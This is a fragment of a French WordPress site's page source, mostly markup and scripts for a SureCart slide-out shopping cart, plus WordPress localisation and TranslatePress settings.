{"imports":{"@wordpress/interactivity":"https://wp-security.org/wp-includes/js/dist/script-modules/interactivity/index.min.js?ver=66c613f68580994bb00a","@surecart/checkout":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout/index.js?ver=3bbe28b8db1e11147c67","@surecart/checkout-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout-events/index.js?ver=ed9647bd6c7865efe2ad","@surecart/checkout-service":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout-actions/index.js?ver=e445a0ee0396d75d52c0","@surecart/google-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/google/index.js?ver=d92e383a18bcf54ea538","@surecart/facebook-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/facebook/index.js?ver=cf5c6499cb7b867894c1","@wordpress/a11y":"https://wp-security.org/wp-includes/js/dist/script-modules/a11y/index.min.js?ver=b7d06936b8bc23cff2ad","@surecart/api-fetch":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/fetch/index.js?ver=1bfba8ea0694a193022a"}}
</script>
<script type="module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/line-item-note/index.js?ver=af6cf14267b5a9ad219f" id="@surecart/line-item-note-js-module"></script>
<script type="module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout/index.js?ver=3bbe28b8db1e11147c67" id="@surecart/checkout-js-module"></script>
<script type="module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/cart/index.js?ver=c2f35b71b4309df849fe" id="@surecart/cart-js-module"></script>
<script type="module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/order-bumps/index.js?ver=c639def39210a6244eb2" id="@surecart/order-bumps-js-module"></script>
<script type="application/json" id="wp-script-module-data-@wordpress/interactivity">
{"state":{"surecart/order-bumps":{"currentPage":1,"perPage":3},"surecart/checkout":{"checkout":{"line_items":{"data":[]}},"discountIsRedeemable":false,"isDiscountApplied":false,"hasDiscountAmount":false,"hasSubtotalScratchAmount":false,"itemsCount":0,"hasItems":false}}}
</script>
<div id="fb-root"></div>
<script async defer crossorigin="anonymous" src="https://connect.facebook.net/fr_FR/sdk.js#xfbml=1&version=v17.0&appId=&autoLogAppEvents=1" nonce="Ci8te34e"></script>
<script>
window.scFetchData =
{"root_url":"https:\/\/wp-security.org\/fr\/wp-json\/","nonce":"40ba390b8d","nonce_endpoint":"https:\/\/wp-security.org\/wp-admin\/admin-ajax.php?action=sc-rest-nonce"} </script>
<!-- Render the cart. --> <div data-wp-context='{"formId":131,"mode":"live"}' data-wp-interactive='{ "namespace": "surecart/checkout" }' data-wp-init="callbacks.init" data-wp-watch="callbacks.onChangeCheckout" data-wp-on-window--storage="callbacks.syncTabs" class="sc-cart-wrapper is-layout-flow wp-container-surecart-slide-out-cart-is-layout-d6743c7d wp-block-surecart-slide-out-cart-is-layout-flow" > <div style="width: 525px; font-size:15px;" class="sc-drawer sc-cart-drawer wp-block-surecart-slide-out-cart" role="dialog" data-wp-bind--aria-label="surecart/cart::state.ariaLabel" data-wp-class--open="surecart/cart::state.open" data-wp-on--keydown="surecart/cart::actions.handleKeydown" > <!-- Cart alert --> <div class="sc-alert sc-alert__alert--danger" role="alert" aria-live="assertive" aria-atomic="true" data-wp-bind--hidden="!state.error" hidden> <div class="sc-alert__icon"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10" /> <line x1="12" y1="8" x2="12" y2="12" /> <line x1="12" y1="16" x2="12.01" y2="16" /> </svg> </div> <div class="sc-alert__text"> <div class="sc-alert__title"> <span data-wp-text="state.errorTitle"></span> </div> <div class="sc-alert__message"> <div data-wp-text="state.errorMessage"></div> <template data-wp-each--message="state.additionalErrors"> <div> <span data-wp-text="context.message"></span> </div> </template> </div> </div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-09de181c wp-block-group-is-layout-flex" style="padding-top:1.5em;padding-right:2em;padding-bottom:0em;padding-left:2em"> <div style="line-height:1;" class="wp-block-surecart-cart-close-button" data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keypress="surecart/cart::actions.toggle" role="button" tabindex="0" aria-label="Fermer le panier" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> <polyline points="12 5 19 12 12 19" /> </svg> </div> <p style="margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;font-size:16px;font-style:normal;font-weight:500;line-height:1"> Vérifiez ma commande</p> <span style="font-size:14px;font-weight:600;line-height:1; border-radius:4px; padding-top:6px;padding-bottom:6px;padding-left:10px;padding-right:10px;" class="wp-block-surecart-cart-count" data-wp-text="state.itemsCount">0</span> </div> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div style="padding-top:2em;padding-bottom:2em;padding-left:2em;padding-right:2em;" class="wp-block-surecart-slide-out-cart-line-items is-layout-flow wp-container-surecart-slide-out-cart-line-items-is-layout-546f3c6d wp-block-surecart-slide-out-cart-line-items-is-layout-flow" role="list"> <template data-wp-each--line_item="state.checkoutLineItems" data-wp-each-key="context.line_item.id" > <div class="sc-product-line-item" data-wp-class--sc-product-line-item--has-swap="state.swap" role="listitem" data-wp-bind--aria-label="state.lineItemAriaLabel"> <div class="sc-product-line-item__content"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div class="wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-bd3f9bef wp-block-group-is-layout-flex"> <figure class="sc-cart-line-item-image-wrap wp-container-content-962be591 wp-duotone-unset-1" data-wp-bind--hidden="!context.line_item.image.src"> <img style="aspect-ratio:1;border-radius:4px;border-width:1px;margin-top:0;margin-bottom:0; margin-top:0;margin-bottom:0;" class="sc-is-covered wp-block-surecart-cart-line-item-image" data-wp-bind--alt="context.line_item.image.alt" data-wp-bind--srcset="context.line_item.image.srcset" data-wp-bind--sizes="context.line_item.image.sizes" data-wp-bind--src="context.line_item.image.src" loading="lazy" /> </figure> <div class="wp-block-group wp-container-content-9cfa9a5a is-vertical is-content-justification-stretch is-nowrap is-layout-flex wp-container-core-group-is-layout-a46423eb wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-eb80f53d wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <a style="font-style:normal;font-weight:500;line-height:1.4;text-decoration:none;" class="wp-block-surecart-cart-line-item-title" data-wp-bind--href="state.lineItemPermalink"> <span data-wp-text="context.line_item.price.product.name"></span> </a> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <div style="font-size:14px;line-height:1.4;" class="wp-block-surecart-cart-line-item-price-name" data-wp-text="state.lineItemPriceName" data-wp-bind--hidden="!state.lineItemPriceName"></div> <div style="font-size:14px;line-height:1.4;" class="wp-block-surecart-cart-line-item-variant" data-wp-text="state.lineItemVariant" data-wp-bind--hidden="!state.lineItemVariant"></div> <div data-wp-interactive='{ "namespace": "surecart/line-item-note" }' style="font-size:14px;line-height:1.4;" class="wp-block-surecart-cart-line-item-note" data-wp-context='{}' data-wp-run="callbacks.init" data-wp-class--line-item-note--is-expanded="context.noteExpanded" data-wp-class--line-item-note--is-collapsible="context.showToggle" data-wp-bind--hidden="surecart/checkout::!state.lineItemNote" data-wp-on--click="actions.toggleNoteExpanded" data-wp-on--keydown="actions.toggleNoteExpanded" data-wp-bind--role="button" data-wp-bind--disabled="!context.showToggle" data-wp-bind--aria-expanded="context.noteExpanded" data-wp-bind--aria-label="Toggle note visibility" tabindex="0" > <div class="line-item-note__text" data-wp-text="surecart/checkout::state.lineItemNote" ></div> <span class="sc-icon" data-wp-class--sc-icon--rotated="context.noteExpanded" > <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="6 9 12 15 18 9" /> </svg> </span> </div> </div></div> <div class="sc-product-line-item__purchasable-status wp-block-surecart-cart-line-item-status has-text-align-right" data-wp-text="context.line_item.purchasable_status_display" data-wp-bind--hidden="!context.line_item.purchasable_status_display" role="status" aria-live="polite" aria-atomic="true" > </div> </div></div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <div class="wp-block-group is-content-justification-right is-nowrap is-layout-flex wp-container-core-group-is-layout-f8a47911 wp-block-group-is-layout-flex" style="line-height:1.4"> <div class="wp-block-surecart-cart-line-item-scratch-amount" data-wp-text="context.line_item.scratch_display_amount" data-wp-bind--hidden="!state.lineItemHasScratchAmount" ></div> <div style="font-style:normal;font-weight:500;" class="wp-block-surecart-cart-line-item-amount has-text-align-right" data-wp-text="context.line_item.subtotal_display_amount"></div> <div style="font-size:14px;" class="wp-block-surecart-cart-line-item-interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text"> <span class="wp-block-surecart-cart-line-item-interval__interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text" data-wp-text="context.line_item.price.short_interval_text" ></span> <span class="wp-block-surecart-cart-line-item-interval__count" data-wp-bind--hidden="!context.line_item.price.short_interval_count_text" data-wp-text="context.line_item.price.short_interval_count_text" ></span> </div> </div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <div style="font-size:14px;" class="wp-block-surecart-cart-line-item-trial has-text-align-right" data-wp-bind--hidden="!context.line_item.price.trial_text" data-wp-text="context.line_item.price.trial_text" ></div> <template data-wp-each--fee="state.lineItemFees" data-wp-each-key="context.fee.id" > <div style="font-size:14px;" class="wp-block-surecart-cart-line-item-fees has-text-align-right"> <span style="font-size:14px;" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.display_amount" ></span> <span style="font-size:14px;" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.description" ></span> </div> </template> </div></div> </div></div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-c0dd7891 wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><div class="sc-input-group sc-input-group-sm sc-quantity-selector wp-block-surecart-cart-line-item-quantity" data-wp-class--quantity--disabled="state.isQuantityDisabled" data-wp-bind--hidden="!state.isEditable" hidden="1"> <div class="sc-input-group-text sc-quantity-selector__decrease" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityDecrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityDecrease" data-wp-bind--disabled="state.isQuantityDecreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityDecreaseDisabled" data-wp-class--button--disabled="state.isQuantityDecreaseDisabled" data-wp-bind--aria-label="surecart/checkout::state.decreaseQuantityAriaLabel" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> <input type="number" class="sc-form-control sc-quantity-selector__control" data-wp-bind--value="context.line_item.quantity" data-wp-on--change="surecart/checkout::actions.onQuantityChange" data-wp-bind--min="context.line_item.min" data-wp-bind--aria-valuemin="context.line_item.min" data-wp-bind--max="context.line_item.max" data-wp-bind--aria-valuemax="context.line_item.max" data-wp-bind--aria-valuenow="context.line_item.quantity" data-wp-bind--disabled="surecart/checkout::state.loading" data-wp-bind--aria-label="surecart/checkout::state.quantityInputAriaLabel" step="1" autocomplete="off" role="spinbutton" /> <div class="sc-input-group-text sc-quantity-selector__increase" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityIncrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityIncrease" data-wp-bind--disabled="state.isQuantityIncreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityIncreaseDisabled" data-wp-class--button--disabled="state.isQuantityIncreaseDisabled" data-wp-bind--aria-label="surecart/checkout::state.increaseQuantityAriaLabel" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="12" y1="5" x2="12" y2="19" /> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> </div> </div></div> <div class="wp-block-group is-vertical is-content-justification-right is-layout-flex wp-container-core-group-is-layout-4269a6fd wp-block-group-is-layout-flex"> <div style="font-size:14px;font-style:normal;font-weight:400;" class="wp-block-surecart-cart-line-item-remove" data-wp-bind--aria-label="surecart/checkout::state.removeItemAriaLabel" data-wp-on--click="surecart/checkout::actions.removeLineItem" data-wp-on--keydown="surecart/checkout::actions.removeLineItem" role="button" tabindex="0" > <svg class="wp-block-surecart-cart-line-item-remove__icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="18" y1="6" x2="6" y2="18" /> <line x1="6" y1="6" x2="18" y2="18" /> </svg> <span class="wp-block-surecart-cart-line-item-remove__label"> Retirer </span> </div> </div> </div> </div> </div> </div></div> </div> <div class="sc-product-line-item__swap" data-wp-bind--hidden="!state.swap" hidden data-wp-on--click="actions.toggleSwap"> <div class="sc-product-line-item__swap-content"> <button type="button" class="sc-toggle" role="switch" aria-checked="false" data-wp-bind--aria-checked="context.line_item.swap" data-wp-class--sc-toggle--checked="context.line_item.swap"> <span class="sc-toggle__label">Utiliser le paramètre</span> <span aria-hidden="true" class="sc-toggle__knob"></span> </button> <span data-wp-text="state.swap.description"></span> </div> <div class="sc-product-line-item__swap-amount"> <span data-wp-text="state.swapDisplayAmount" class="sc-product-line-item__swap-amount-value"></span> <span data-wp-text="state.swapIntervalText" class="sc-product-line-item__swap-amount-interval"></span> <span data-wp-text="state.swapIntervalCountText" class="sc-product-line-item__swap-amount-interval-count"></span> </div> </div> </div> </template> </div> </div></div> <div class="wp-block-group" style="border-top-color:#b0b0b069;border-top-width:1px;padding-top:0em;padding-right:0em;padding-bottom:0em;padding-left:0em"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div style="border-bottom-width:1px;border-bottom-color:#b0b0b069; padding-top:1.5em;padding-bottom:1.5em;padding-left:2em;padding-right:2em;" class="wp-block-surecart-cart-order-bumps" data-wp-context='{"hideAddedItems":true}' data-wp-interactive='{ "namespace": "surecart/order-bumps" }' data-wp-init="callbacks.init" data-wp-bind--hidden="!state.hasOrderBumps" hidden> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-1ceffb7a wp-block-group-is-layout-flex" style="margin-bottom:0.75em"> <p style="margin-top:0;margin-bottom:0;font-style:normal;font-weight:500">Suggéré pour vous</p> <nav class="wp-block-surecart-cart-order-bump-pagination is-layout-flex wp-container-surecart-cart-order-bump-pagination-is-layout-d04bdab2 wp-block-surecart-cart-order-bump-pagination-is-layout-flex" data-wp-bind--hidden="!state.showPagination" aria-label="Pagination des augmentations de commande" hidden> <div aria-disabled="true" disabled class="has-arrow-type-chevron wp-block-surecart-cart-order-bump-pagination-previous" data-wp-on--click="surecart/order-bumps::actions.previousPage" data-wp-on--keydown="surecart/order-bumps::actions.handlePreviousKeydown" data-wp-bind--disabled="!state.hasPreviousPage" data-wp-bind--aria-disabled="!state.hasPreviousPage" aria-label="Page précédente" role="button" tabindex="0" > <svg aria-hidden="true" class="wp-block-surecart-cart-order-bump-pagination-previous__icon" xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="15 18 9 12 15 6" /> </svg> </div> <div aria-disabled="true" disabled class="has-arrow-type-chevron wp-block-surecart-cart-order-bump-pagination-next" data-wp-on--click="surecart/order-bumps::actions.nextPage" data-wp-on--keydown="surecart/order-bumps::actions.handleNextKeydown" data-wp-bind--disabled="!state.hasNextPage" data-wp-bind--aria-disabled="!state.hasNextPage" aria-label="Page suivante" role="button" tabindex="0" > <svg aria-hidden="true" class="wp-block-surecart-cart-order-bump-pagination-next__icon" xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="9 18 15 12 9 6" /> </svg> </div> </nav> </div> <ul class="wp-block-surecart-cart-order-bump-template is-layout-flex wp-container-surecart-cart-order-bump-template-is-layout-242c3b10 wp-block-surecart-cart-order-bump-template-is-layout-flex" role="list" data-wp-class--has-overflow="state.hasMultipleBumps" data-wp-on--scrollend="callbacks.onCarouselScroll" data-wp-on--keydown="actions.handleCarouselKeydown" tabindex="0" data-wp-bind--aria-label="state.orderBumpsListAriaLabel" > <template data-wp-each--bump="state.orderBumps" data-wp-each-key="context.bump.id" > <li class="sc-cart-order-bump-item" role="listitem"> <div class="wp-block-group has-border-color wp-container-content-9cfa9a5a is-nowrap is-layout-flex wp-container-core-group-is-layout-811b0336 wp-block-group-is-layout-flex" style="border-color:#e0e0e0;border-width:1px;border-radius:12px;padding-top:0.75em;padding-right:1em;padding-bottom:0.75em;padding-left:0.75em"> <figure class="sc-cart-order-bump-image-wrap wp-container-content-d0d0a6b5" data-wp-bind--hidden="!context.bump.price.product.line_item_image.src"> <img style="aspect-ratio:1;width:72px;border-radius:8px;" class="sc-is-covered wp-block-surecart-cart-order-bump-image" data-wp-bind--alt="context.bump.price.product.name" data-wp-bind--src="context.bump.price.product.line_item_image.src" loading="lazy" /> </figure> <div class="wp-block-group wp-container-content-9cfa9a5a is-vertical is-layout-flex wp-container-core-group-is-layout-42e9c677 wp-block-group-is-layout-flex"> <span style="font-size:15px;font-weight:600;line-height:1.3;" class="wp-block-surecart-cart-order-bump-title" data-wp-text="context.bump.name" ></span> <div style="color:#6b7280; font-size:13px;line-height:1.3;" class="wp-block-surecart-cart-order-bump-description has-text-color" data-wp-bind--hidden="!context.bump.metadata.description" data-wp-text="context.bump.metadata.description" hidden></div> <div class="wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-89a94f6a wp-block-group-is-layout-flex"> <div style="font-size:14px;" class="wp-block-surecart-cart-order-bump-scratch-amount" data-wp-text="context.bump.subtotal_display_amount" data-wp-bind--hidden="!state.bumpHasDiscount" ></div> <div style="font-size:14px;font-weight:500;" class="wp-block-surecart-cart-order-bump-amount" data-wp-text="context.bump.total_display_amount"></div> </div> </div> <div style="font-size:18px;font-weight:400; border-color:#d1d5db;border-top-left-radius:74.6%;border-top-right-radius:74.6%;border-bottom-left-radius:74.6%;border-bottom-right-radius:74.6%;border-width:1px; padding-top:0.5em;padding-bottom:0.5em;padding-left:0.5em;padding-right:0.5em;" class="sc-cart-order-bump-add-button wp-block-surecart-cart-order-bump-add-button has-border-color" role="button" tabindex="0" data-wp-on--click="surecart/order-bumps::actions.addBumpToCart" data-wp-on--keydown="surecart/order-bumps::actions.handleAddButtonKeydown" data-wp-bind--disabled="state.isBumpInCart" data-wp-bind--aria-disabled="state.isBumpInCart" data-wp-class--sc-cart-order-bump-add-button--added="state.isBumpInCart" data-wp-bind--aria-label="state.addButtonAriaLabel" aria-label="Ajouter au panier" > <span class="sc-cart-order-bump-add-button__icon" aria-hidden="true" data-wp-bind--hidden="state.isBumpInCart"> <svg aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="12" y1="5" x2="12" y2="19" /> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </span> <span class="sc-cart-order-bump-add-button__icon" aria-hidden="true" data-wp-bind--hidden="!state.isBumpInCart" hidden> <svg aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="20 6 9 17 4 12" /> </svg> </span> </div> </div> </li> </template> </ul> </div> <div class="wp-block-group" style="margin-top:0;margin-bottom:0;padding-top:2em;padding-right:2em;padding-bottom:2em;padding-left:2em"><div class="wp-block-group__inner-container is-layout-constrained wp-container-core-group-is-layout-a63a6252 wp-block-group-is-layout-constrained"> <div class="wp-block-surecart-slide-out-cart-items-subtotal is-content-justification-space-between is-nowrap is-layout-flex wp-container-surecart-slide-out-cart-items-subtotal-is-layout-7351673c wp-block-surecart-slide-out-cart-items-subtotal-is-layout-flex"> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <p style="margin-top:0px;margin-bottom:0px;font-size:18px;font-style:normal;font-weight:500;line-height:1.4"> Sous-total</p> <p class="has-text-color has-link-color wp-elements-3ccbd622ec95a2fb9ce4984e15710a06" style="color:var(--sc-input-help-text-color);font-size:14px;line-height:1.4">Taxes et frais de port calculés à la caisse</p> </div></div> <div class="wp-block-group is-content-justification-right is-nowrap is-layout-flex wp-container-core-group-is-layout-f8a47911 wp-block-group-is-layout-flex"><span style="font-size:18px;line-height:1.4;" class="wp-block-surecart-cart-subtotal-scratch-amount" data-wp-text="state.checkout.subtotal_scratch_display_amount" data-wp-bind--hidden="!state.hasSubtotalScratchAmount" data-wp-bind--aria-label="state.subtotalScratchAriaLabel" hidden></span> <span style="font-size:18px;font-style:normal;font-weight:500;line-height:1.4;" class="wp-block-surecart-cart-subtotal-amount" data-wp-text="state.checkout.subtotal_display_amount"></span> </div> </div> <div class="sc-cart-items-submit__wrapper" style="" > <div class="wp-block-button"> <a style="border-radius:4px;" class="wp-block-button__link wp-element-button sc-button__link wp-block-surecart-slide-out-cart-items-submit" href="https://wp-security.org/fr/checkout/" data-wp-bind--disabled="state.loading" data-wp-class--sc-button__link--busy="state.loading" > <span class="sc-spinner" aria-hidden="false"></span> <span class="sc-button__link-text">Passer à la caisse</span> </a> </div> </div> </div></div> </div></div> <div class="sc-block-ui" data-wp-bind--hidden="!state.loading" hidden></div> </div> <!-- backdrop --> <div class="sc-drawer__backdrop" data-wp-on--mousedown="surecart/cart::actions.closeOverlay" data-wp-on--touchstart="surecart/cart::actions.closeOverlay" data-wp-class--show="surecart/cart::state.open" data-wp-on--keydown="surecart/cart::actions.handleKeydown"></div> </div> <!-- Render floating cart icon --> <div data-wp-interactive='{ "namespace": "surecart/checkout" }' class="wp-block-surecart-cart-icon" data-wp-context='{"formId":131,"mode":"live"}' data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keydown="surecart/cart::actions.toggle" tabindex="0" role="button" data-wp-bind--hidden="!state.hasItems" hidden> <div class="wp-block-surecart-cart-icon__container"> <div class="wp-block-surecart-cart-icon__icon" aria-label="Bouton du panier."> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <path d="M6 2L3 6v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V6l-3-4z" /> <line x1="3" y1="6" x2="21" y2="6" /> <path d="M16 10a4 4 0 0 1-8 0" /> </svg> </div> <span class="wp-block-surecart-cart-icon__count" data-wp-text="state.itemsCount" data-wp-bind--aria-label="state.itemsCountAriaLabel" >0</span> </div> </div><script src="https://wp-security.org/wp-includes/js/dist/url.min.js?ver=9e178c9516d1222dc834" id="wp-url-js"></script>
<script src="https://wp-security.org/wp-includes/js/dist/hooks.min.js?ver=dd5603f07f9220ed27f1" id="wp-hooks-js"></script>
<script src="https://wp-security.org/wp-includes/js/dist/i18n.min.js?ver=c26c3dc7bed366793375" id="wp-i18n-js"></script>
<script id="wp-i18n-js-after">
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
//# sourceURL=wp-i18n-js-after
</script>
<script id="wp-api-fetch-js-translations">
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "default", {"translation-revision-date":"2026-04-20 08:59:17+0000","generator":"GlotPress\/4.0.3","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=2; plural=n > 1;","lang":"fr"},"The response is not a valid JSON response.":["La r\u00e9ponse n\u2019est pas une r\u00e9ponse JSON valide."],"Media upload failed. If this is a photo or a large image, please scale it down and try again.":["Le t\u00e9l\u00e9versement du m\u00e9dia a \u00e9chou\u00e9. S\u2019il s\u2019agit d\u2019une photo ou d\u2019une grande image, veuillez la redimensionner puis r\u00e9essayer."],"Unable to connect. Please check your Internet connection.":["Impossible de se connecter. Veuillez v\u00e9rifier votre connexion Internet."],"Could not get a valid response from the server.":["Impossible d\u2019obtenir du serveur une r\u00e9ponse valide."]}},"comment":{"reference":"wp-includes\/js\/dist\/api-fetch.js"}} );
//# sourceURL=wp-api-fetch-js-translations
</script>
<script src="https://wp-security.org/wp-includes/js/dist/api-fetch.min.js?ver=3a4d9af2b423048b0dee" id="wp-api-fetch-js"></script>
<script id="wp-api-fetch-js-after">
wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "https://wp-security.org/fr/wp-json/" ) );
wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "40ba390b8d" );
wp.apiFetch.use( wp.apiFetch.nonceMiddleware );
wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware );
wp.apiFetch.nonceEndpoint = "https://wp-security.org/wp-admin/admin-ajax.php?action=rest-nonce";
//# sourceURL=wp-api-fetch-js-after
</script>
<script src="https://wp-security.org/wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381" id="wp-dom-ready-js"></script>
<script id="wp-a11y-js-translations">
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "default", {"translation-revision-date":"2026-04-20 08:59:17+0000","generator":"GlotPress\/4.0.3","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=2; plural=n > 1;","lang":"fr"},"Notifications":["Notifications"]}},"comment":{"reference":"wp-includes\/js\/dist\/a11y.js"}} );
//# sourceURL=wp-a11y-js-translations
</script>
<script src="https://wp-security.org/wp-includes/js/dist/a11y.min.js?ver=cb460b4676c94bd228ed" id="wp-a11y-js"></script>
<script id="trp-dynamic-translator-js-extra">
var trp_data = {"trp_custom_ajax_url":"https://wp-security.org/wp-content/plugins/translatepress-multilingual/includes/trp-ajax.php","trp_wp_ajax_url":"https://wp-security.org/wp-admin/admin-ajax.php","trp_language_to_query":"fr_FR","trp_original_language":"en_US","trp_current_language":"fr_FR","trp_skip_selectors":["[data-no-translation]","[data-no-dynamic-translation]","[data-trp-translate-id-innertext]","script","style","head","trp-span","translate-press","[data-trp-translate-id]","[data-trpgettextoriginal]","[data-trp-post-slug]"],"trp_base_selectors":["data-trp-translate-id","data-trpgettextoriginal","data-trp-post-slug"],"trp_attributes_selectors":{"text":{"accessor":"outertext","attribute":false},"block":{"accessor":"innertext","attribute":false},"image_src":{"selector":"img[src]","accessor":"src","attribute":true},"submit":{"selector":"input[type='submit'],input[type='button'], input[type='reset']","accessor":"value","attribute":true},"placeholder":{"selector":"input[placeholder],textarea[placeholder]","accessor":"placeholder","attribute":true},"title":{"selector":"[title]","accessor":"title","attribute":true},"a_href":{"selector":"a[href]","accessor":"href","attribute":true},"button":{"accessor":"outertext","attribute":false},"option":{"accessor":"innertext","attribute":false},"aria_label":{"selector":"[aria-label]","accessor":"aria-label","attribute":true},"video_src":{"selector":"video[src]","accessor":"src","attribute":true},"video_poster":{"selector":"video[poster]","accessor":"poster","attribute":true},"video_source_src":{"selector":"video source[src]","accessor":"src","attribute":true},"audio_src":{"selector":"audio[src]","accessor":"src","attribute":true},"audio_source_src":{"selector":"audio source[src]","accessor":"src","attribute":true},"picture_image_src":{"selector":"picture image[src]","accessor":"src","attribute":true},"picture_source_srcset":{"selector":"picture source[srcset]","accessor":"srcset","attribute":true}},"trp_attributes_accessors":["outertext","innertext","src","value","placeholder","title","href","aria-label","poster","srcset"],"gettranslationsnonceregular":"97ddaf2439","showdynamiccontentbeforetranslation":"","skip_strings_from_dynamic_translation":[],"skip_strings_from_dynamic_translation_for_substrings":{"href":["amazon-adsystem","googleads","g.doubleclick"]},"duplicate_detections_allowed":"100","trp_translate_numerals_opt":"no","trp_no_auto_translation_selectors":["[data-no-auto-translation]"]};
//# sourceURL=trp-dynamic-translator-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/translatepress-multilingual/assets/js/trp-translate-dom-changes.js?ver=3.1.8" id="trp-dynamic-translator-js"></script>
